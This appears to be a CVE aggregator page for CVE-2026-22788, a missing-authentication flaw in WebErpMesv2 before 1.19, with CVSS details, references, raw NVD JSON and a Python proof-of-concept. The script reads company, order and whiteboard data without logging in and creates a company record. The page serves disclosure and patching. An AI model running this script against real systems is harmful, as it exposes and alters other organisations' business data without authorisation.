Security Vulnerability Report
CVE-2026-22788 CVSS 8.2 HIGH

CVE-2026-22788

Published: 2026-01-12 22:16:08
Last Modified: 2026-01-21 19:11:14

Description

WebErpMesv2 is a web-based Resource Management and Manufacturing Execution System for industry. Prior to version 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware (CWE-306, Missing Authentication for Critical Function). An unauthenticated remote attacker can read business-critical data, including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in version 1.19.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wem-project:wem:*:*:*:*:*:*:*:* - VULNERABLE (WebErpMesv2 < 1.19)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-22788 PoC - WebErpMesv2 Unauthenticated Access
# Target: WebErpMesv2 < 1.19
target = "http://target.com"  # replace with the target URL

# Unauthenticated read of the companies API endpoint
companies_endpoint = f"{target}/api/companies"
response = requests.get(companies_endpoint)
print(f"Companies response status code: {response.status_code}")
print(f"Companies data: {response.text}")

# Unauthenticated read of the orders API endpoint
orders_endpoint = f"{target}/api/orders"
response = requests.get(orders_endpoint)
print(f"Orders response status code: {response.status_code}")
print(f"Orders data: {response.text}")

# Unauthenticated read of the whiteboard API endpoint
whiteboard_endpoint = f"{target}/api/whiteboard"
response = requests.get(whiteboard_endpoint)
print(f"Whiteboard response status code: {response.status_code}")
print(f"Whiteboard data: {response.text}")

# Attempt a write operation - create a company record
create_company = f"{target}/api/companies"
company_data = {"name": "Test Company", "description": "Created via PoC"}
response = requests.post(create_company, json=company_data)
print(f"Create company response status code: {response.status_code}")
print(f"Create result: {response.text}")
```

References

https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23 (Patch)
https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w (Exploit, Patch, Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-22788", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:08.343", "lastModified": "2026-01-21T19:11:14.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19."}, {"lang": "es", "value": "WebErpMesv2 es un sistema web de gestión de recursos y ejecución de fabricación para la industria. Antes de la 1.19, la aplicación WebErpMesV2 expone múltiples puntos finales de API sensibles sin middleware de autenticación. Un atacante remoto no autenticado puede leer datos críticos para el negocio, incluyendo empresas, cotizaciones, pedidos, tareas y pizarras. Acceso de escritura limitado permite la creación de registros de empresas y la manipulación completa de pizarras de colaboración. Esta vulnerabilidad está corregida en la 1.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wem-project:wem:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.19", "matchCriteriaId": "B8FFED4C-1ACD-4922-99EB-4951BD1C6B8E"}]}]}], "references": [{"url": "https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}
```